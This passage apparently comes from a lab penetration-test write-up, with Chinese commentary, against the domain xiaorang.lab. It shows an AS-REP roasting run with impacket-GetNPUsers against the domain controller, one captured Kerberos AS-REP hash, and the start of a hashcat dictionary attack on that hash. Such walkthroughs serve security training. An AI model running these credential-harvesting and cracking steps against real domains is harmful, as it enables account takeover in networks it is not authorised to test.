zuoqiutai@xiaorang.lab
siyi@xiaorang.lab
shenshan@xiaorang.lab
tongdong@xiaorang.lab

利用获取到的用户进行AS-REPRoast攻击，攻击域控机，也就是12

┌──(root㉿kali)-[/home/kali]
└─# proxychains -q impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile username.txt xiaorang.lab/
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User chengqiu@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User louyou@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User maqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wenbiao@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User weishengshan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:72d2bae127798ec3ab56405067b72fb3$f32f22f2de9cbec10e31d36d94bc609623e0754e1a53d2270e6ee291688f5de431ca42fd35d5970f714e0e335c7ad2cb4b8b58c99c557a40f206f44c6c69ac701a59dd9cfb7bee01c1153efa86aebdc93f1eecab9e29d6427e1f9c85115951b619418d9a9a52f6ac4dfb96955179ce31b9b86d716f2f12f5f717ac4eea46c6d10b2dc91adc5f6eb4cfa0dd520153122ac52445454ea65ed1417168868097457d50b2570077a3f28c55eb39f053e7fc87fb46b75c25b4585300929e89fb8338dd95e98dda3eb9d44a9f2562aef5d793987e0f4651a02c336412d47b393336af5107ca6c235197be1ec6e933e0
[-] User chuyuan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wenliang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yulvxue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User luyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ganjian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pangzhen@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guohong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lezhong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sheweiyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dujian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lidongjin@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hongqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yexing@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User maoda@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qiaomei@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User ganjian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

发现有一个账号返回了hash，直接使用hashcat爆破出密码

┌──(root㉿kali)-[/home/kali]
└─# hashcat -a 0 --force ss.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-14650HX, 1424/2912 MB (512 MB allocatable), 4MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

